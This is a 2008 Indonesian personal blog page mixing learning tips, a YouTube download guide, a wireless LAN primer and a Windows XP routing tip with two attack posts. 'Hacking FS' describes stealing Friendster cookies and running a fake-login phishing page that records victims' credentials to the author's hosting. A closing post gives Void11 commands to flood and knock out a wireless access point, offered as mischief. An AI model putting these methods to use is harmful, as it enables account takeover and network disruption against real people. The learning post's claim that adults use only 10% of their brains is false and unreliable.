Creativity and News Tech

Simple, Fast, and Sharp Information

Bagaimana Agar Belajar Lebih Cepat!!!! February 4, 2008

Filed under: Uncategorized — intics @ 2:48 pm

Hacking Knowledge: 77 Ways to Learn Faster, Deeper, and Better

knowledgeIf someone granted you one wish, what do you imagine you would want out of life that you haven’t gotten yet? For many people, it would be self-improvement and knowledge. New knowledge is the backbone of society’s progress. Great thinkers such as Leonardo da Vinci, Thomas Edison, Benjamin Franklin, Albert Einstein, and others’ quests for knowledge have led society to many of the marvels we enjoy today. Your quest for knowledge doesn’t have to be as Earth-changing as Einstein’s, but it can be an important part of your life, leading to a new job, better pay, a new hobby, or simply knowledge for knowledge’s sake — whatever is important to you as an end goal.

Life-changing knowledge does typically require advanced learning techniques. In fact, it’s been said that the average adult only uses 10% of his/her brain. Imagine what we may be capable of with more advanced learning techniques. Here are 77 tips related to knowledge and learning to help you on your quest. A few are specifically for students in traditional learning institutions; the rest for self-starters, or those learning on their own. Happy learning. (more…)

Advertisements
 

Download Video di YouTube

Filed under: Uncategorized — intics @ 1:40 pm

Cara download video koleksi youtube Caranya:

  1. Klik kanan video yang jd target bwat di download
  2. Pilih copy link location
  3. Buka situs keepvid.com
  4. Paste link location nya di page browser nya
  5. Rubah tipenya jadi youtube biar cepet browsing nya
  6. Setelah Itu klik download
  7. Muncul di bawahnya ada papan berisikan perintah >>download link<< (.flv – flash video)

*format flv yang pernah gua coba bisanya di buka di program k-lite window media classic…

Alternative :

Download  Program ULTRAGET VIDEO DOWNLOADER….(cari di Om Google ya……)

tapi ada syarat tuk donlot, harus punya login/jdi member di youtube.

OK!!

 

TIPS Memikat Cewe February 1, 2008

Filed under: Uncategorized — intics @ 12:08 pm

here the file……………….

cara_memikat_wanita_idaman_anda.pdf

 

Hacking FS

Filed under: Net — intics @ 11:17 am
1. Metode pencurian “roti”.
  • Dulu metode ini sempat populer. Kita hanya perlu “memaksa” korban mengunjungi/melihat profil kita, maka kita otomatis langsung mendapatkan kukis dr korban itu, berserta beberapa info tambahan (browser, IP, waktu).
  • Dengan kukis yg kita dapet itu, tanpa perlu mengetahui ID atau pass korban, kita bisa masuk login sebagai dia.
  • Dan perlu diketahui juga bahwa masa berlaku kukis ini UNLIMITED, so kukis yg dulu kita dapat masih bisa digunakan ampe sekarang, meskipun si korban dah berkali2 ganti ID atau pass

2. Teknik fake login adalah memancing korban untuk memasukkan ID dan pass nya ke halaman login yg mirip sekali dengan punya friendster. Hasil nya akan di record ke web hosting yg udah dipersiapkan.

Syarat Mutlak untuk melakukan teknik pencurian kukis maupun pencurian
ID dan pass adalah KITA MESTI MEMPUNYAI WEB HOSTING YG SUPPORT DGN PHP.
Teknik fake login menggunakan 3 files antara lain:
1. login.html (Di page login FS bohongan ini nanti korban kita “paksa”
memasukkan ID dan passnya)
2. Login.PHP (File ini berfungsi untuk merecord log ke web hosting kita.
3. Redirect.js (Berfungsi untuk meredirect halaman login.html ke
halaman login.php)
4. Amunisi (file ini kita “cangkok-kan” di profil kita yg, beberapa
tempat yg sering vuln adalah, Favorite Books, Favorite Movies,
Favorite Music, Favorite TV Shows, About Me(Describe Yourself,
Describe Who You Want to Meet, Media Box, dan Box CSS pun pernah ada
bug nya.

 

mengenal W-Lan November 17, 2007

Filed under: Net — intics @ 9:58 am

Mengenal Wireless LAN
—————————–

Wireless Local Area Network (WLAN) adalah jaringan komputer yang menggunakan gelombang radio sebagai media transmisi data. Informasi (data) ditransfer dari satu komputer ke komputer lain menggunakan gelombang radio. WLAN sering disebut sebagai Jaringan Nirkabel atau jaringan wireless.
Proses komunikasi tanpa kabel ini dimulai dengan bermunculannya peralatan berbasis gelombang radio, seperti walkie talkie, remote control, cordless phone, ponsel, dan peralatan radio lainnya. Lalu adanya kebutuhan untuk menjadikan komputer sebagai barang yang mudah dibawa (mobile) dan mudah digabungkan dengan jaringan yang sudah ada. Hal-hal seperti ini akhirnya mendorong pengembangan teknilogi wireless untuk jaringan komputer.
Pada tahun 1997, sebuah lembaga independen bernama IEEE membuat spesifikasi/standar WLAN pertama yang diberi kode 802.11. Peralatan yang sesuai standar 802.11 dapat bekerja pada frekuensi 2,4GHz, dan kecepatan transfer data (throughput) teoritis maksimal 2Mbps. Sayangnya peralatan yang mengikuti spesifikasi 802.11 kurang diterima dipasar. Througput sebesar ini dianggap kurang memadai untuk aplikasi multimedia dan aplikasi kelas berat lainnya.
Pada bulan Juli 1999, IEEE kembali mengeluarkan spesifikasi baru bernama 802.11b. Kecepatan transfer data teoritis maksimal yang dapat dicapai adalah 11 Mbps. Kecepatan tranfer data sebesar ini sebanding dengan Ethernet tradisional (IEEE 802.3 10Mbps atau 10Base-T). Peralatan yang menggunakan standar 802.11b juga bekerja pada frekuensi 2,4Ghz. Salah satu kekurangan peralatan wireless yang bekerja pada frekuensi ini adalah kemungkinan terjadinya interferensi dengan cordless phone, microwave oven, atau peralatan lain yang menggunakan gelombang radio pada frekuensi sama.
Pada saat hampir bersamaan, IEEE membuat spesifikasi 802.11a yang menggunakan teknik berbeda. Frekuensi yang digunakan 5Ghz, dan mendukung kecepatan transfer data teoritis maksimal sampai 54Mbps. Gelombang radio yang dipancarkan oleh peralatan 802.11a relatif sukar menembus dinding atau penghalang lainnya. Jarak jangkau gelombang radio relatif lebih pendek dibandingkan 802.11b. Secara teknis, 802.11b tidak kompatibel dengan 802.11a. Namun saat ini cukup banyak pabrik hardware yang membuat peralatan yang mendukung kedua standar tersebut.
Pada tahun 2002, IEEE membuat spesifikasi baru yang dapat menggabungkan kelebihan 802.11b dan 802.11a. Spesifikasi yang diberi kode 802.11g ini bekerja pada frekuensi 2,4Ghz dengan kecepatan transfer data teoritis maksimal 54Mbps. Peralatan 802.11g kompatibel dengan 802.11b, sehingga dapat saling dipertukarkan. Misalkan saja sebuah komputer yang menggunakan kartu jaringan 802.11g dapat memanfaatkan access point 802.11b, dan sebaliknya.
Ada beberapa istilah yang cukup popular berkaitan dengan wireless. Beberapa di antaranya yaitu:

1. Wi-Fi atau WiFi
Wi-Fi atau Wireless Fidelity adalah nama lain yang diberikan untuk produk yang mengikuti spesifikasi 802.11. Sebagian besar pengguna komputer lebih mengenal istilah Wi-Fi card/adapter dibandingkan dengan 802.11 card/adapter. Wi-Fi merupakan merek dagang, dan lebih popular dibandingkan kata “IEEE 802.11”.

2. Channel
Bayangkanlah pita frekuansi seperti sebuah jalan, dan channel seperti jalur-jalur pemisah pada jalan tersebut. Peralatan 802.11a bekerja pada frekuensi 5,15 – 5,875 GHz, sedangkan peralatan 802.11b dan 802.11g bekerja pada frekuansi 2,4 – 2,497 GHz. Jadi , 802.11a menggunakan pita frekuensi lebih besar dibandingkan 802.11b atau 802.11g. Semakin lebar pita frekuensi, semakin banyak channel yang tersedia.
Setiap channel dapat digunakan untuk mengangkut informasi secara penuh. Pada 802.11a tersedia sampai 8 non-overlapping channel. Masing-masing dapat “dibebani” throughput sebesar 54Mbps, atau total throughput 432Mbps. Sedangkan pada 802.11b/g tersedia 3 non-overlapping channel yang masing-masing dapat “dibebani” throughput sampai 11Mbps, atau total throughput 33Mbps.
Agar dapat saling berkomunikasi, setiap peralatan wireless harus menggunakan channel yang sama. Pengguna dapat mengatur nomor channel saat melakukan instalasi driver atau melalui utiliti bantu yang disediakan masing-masing vendor.

3. MIMO
MIMO (Multiple Input Multiple Output) merupakan teknologi Wi-Fi terbaru. MIMO dibuat berdasarkan spesifikasi Pre-802.11n. Kata ”Pre-” menyatakan “Prestandard versions of 802.11n”. MIMO menawarkan peningkatan throughput, keunggulan reabilitas, dan peningkatan jumlah klien yg terkoneksi. Daya tembus MIMO terhadap penghalang lebih baik, selain itu jangkauannya lebih luas sehingga Anda dapat menempatkan laptop atau klien Wi-Fi sesuka hati. Access Point MIMO dapat menjangkau berbagai perlatan Wi-Fi yg ada disetiap sudut ruangan.
Secara teknis MIMO lebih unggul dibandingkan saudara tuanya 802.11a/b/g. Access Point MIMO dapat mengenali gelombang radio yang dipancarkan oleh adapter Wi-Fi 802.11a/b/g. MIMO mendukung kompatibilitas mundur dengan 802.11 a/b/g. Peralatan Wi-Fi MIMO dapat menghasilkan kecepatan transfer data sebesar 108Mbps.

4. WEP
WEP (Wired Equivalent Privacy) merupakan salah satu fitur keamanan/sekuriti yang bersifat build-in pada peralatan Wi-Fi. Keamanan merupakan masalah yang serius bagi pengguna Wi-Fi akibat gelombang radio yang dipancarkan adapter Wi-Fi dapat diterima oleh semua peralatan Wi-Fi yang ada di sekitarnya (atau gedung di sebelahnya). Tentu saja kondisi semacam ini sangat rawan krn informasi dapat “ditangkap” dengan mudah. Oleh sebab itu Wi-Fi dibuat dengan beberapa jenis enkripsi : 40 bit, 64 bit, 128 bit dan 256 bit. Pengguna WEP akan meningkatkan keamanan data yang ditransfer meskipun konsekuensinya penurunan throughput data.

5. SSID
SSID (Service Set IDentifier) merupakan identifikasi atau nama untuk jaringan wireless. Setiap peralatan Wi-Fi harus menggunakan SSID tertentu. Peralatan Wi-Fi dianggap satu jaringan jika mengunakan SSID yang sama. Agar dapat berkomunikasi, setiap perlatan wireless haruslah menggunakan SSID dan channel yang sama. SSID bersifat case-sensitive, penulisan huruf besar dan huruf kecil sangat berpengaruh.

6. SES
SES merupakan singkatan dari SecureEasySetup. SES merupakan jawaban terhadap kesulitan setup security jaringan yg selama ini dirasakan sejumlah kalangan. Hanya dengan menekan satu tombol, SES secara otomatis memberikan SSID dan kode sekuriti ke router dan adapter serta menerapkan security WPA (Wireless Protected Access). Untuk menggunakan SES, pengguna hanya perlu menekan tombol SES pada router, lalu pada client, dan selanjutnya kedua perangkat akan membuat sebuah jalur komunikasi yang aman.

 

Membuat Window XP menjadi ROUTER

Filed under: Net — intics @ 9:54 am

Membuat Window XP menjadi ROUTER?

Mungkinkah?

Jawabnya : Mungkin / Pasti Bisa

Jika Anda memiliki 2 segmen jaringan, Anda dapat menggunakan Win2000 Pro / WinXP Pro sebagai router untuk kedua segmen tersebut.

Syarat:
1. Minimal memiliki 2 Kartu Jaringan (LAN-CARD / NIC).
2. Konfigurasi IP Address pada masing-masing kartu jaringan.
3. Konfigurasi IP tersebut sebagai Default Gateway.

Contoh:
– Segment A – 192.168.0.0/24
– Segment B – 192.168.1.0/24

(/24 maksudnya 255.255.255.0 – lihat informasi CIDR)

– NIC A – 192.168.0.1 < menjadi Default Gateway untuk Segmen A
– NIC B – 192.168.1.1 < menjadi Default Gateway untuk Segmen B

Selanjutnya konfigurasi IP Routing untuk kedua segmen.

Ingat…!!!
Fitur ini tidak dapat dikonfigurasi melalui interface GUI baik di Win2000 maupun WinXP…
Jadi… Anda perlu mengedit REGISTRY.

Caranya:
1. Run > Regedit.
2. Meluncurlah ke : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
3. Ubah nilai “IPEnableRouter” menjadi 1
3. Tutup Regedit.
4. Restart PC.

 

Melumpuhkan Access Point dengan Void11 —

Filed under: Net — intics @ 9:52 am

Melumpuhkan Access Point dengan Void11 —

Author : lirva32
Email : lirva32 [at] yahoo [dot] com

Wah, lirva32 mau ngajarin iseng2 nih… kali ini lirva mau melakukan DoS pada Access Point…
Jadi nanti AP akan dibanjiri dengan paket2 data… kalo udah banjir tuh AP bakalan ngedrop..
Gimna caranya…?? nanti dulu… lirva mau menjelaskan aplikasinya dulu….

Void11
Void11 merupakan salah satu aplikasi yang digunakan unutk melakukan mass flooding terhadap Access Point.
Void11 memiliki jenis metode attack, yaitu :

1. Deauthenticate Clients (default mode)
Dengan metode ini, void11 akan melakukan flooding WLAN dengan ‘deauthentication packets’ sehingga
client yang terautentikasi didalam jaringannya akan ngedrop dan terputus dari jaringan WLAN.

2. Authentication Flood
Dengan metode ini, void11 akan melakukan flooding ke Access Point dengan ‘authentication packets (random client MACs)’

3. Association Flood
Dengan metode ini, void11 akan melakukan flooding dengan association packets (random client MACs)

Persiapan :
+ komputer | laptop yang udah ada wificard dengan chipset Prism.
+ Lakukan Wardriving utk mendapatkan MAC Address + SSID AP si target
+ Donlod void11 dari : http://lirva32.org/images/void11-0.2.0.tar.bz2
+ Konfigurasi :

cd /tools/wifi/void11-0.2.0/console

iwconfig wlan0 mode master

iwpriv wlan0 hostapd 1

./void11_hopper

alternatif void_hopper mode juga bisa meprgunakan :

iwconfig wlan0 channel 6 (set card to channel 6)

Penggunaan :
void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]

Penyerangan :
Misalkan saja kita ingin melakukan penyerangan terhadap sebuah AP, maka saya awali dulu dengan melakukan wardriving…biasanya saya mepergunakan kismet.
Dari hasil wardriving saya mendapatkan :

SSID : linksys
mAC : 00:06:BF:64:AB:35

Siapakan penyerangan sbb :
void11_penetration wlan0 -D -t 1 -S linksys -B 00:06:BF:64:AB:35